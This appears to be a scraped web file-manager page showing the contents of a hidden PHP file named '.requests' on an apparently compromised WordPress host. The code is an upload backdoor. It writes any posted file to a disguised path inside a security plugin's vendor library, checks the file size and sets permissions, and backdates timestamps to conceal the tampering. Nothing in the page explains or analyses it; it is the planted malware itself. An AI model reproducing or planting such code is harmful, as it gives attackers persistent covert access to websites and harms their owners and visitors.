Edit file File name : .requests Content :<?php $p = "/home/provobis/other_sites/portretdevoluntar//home/provobis/.cpanel/ea-php-cli/other_sites/saptamanavoluntariatului.ro/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sqlupdate"; $ft = 1738819851; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 5288) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 5288"; } @unlink($p); } } die('_upload_failed_'); Save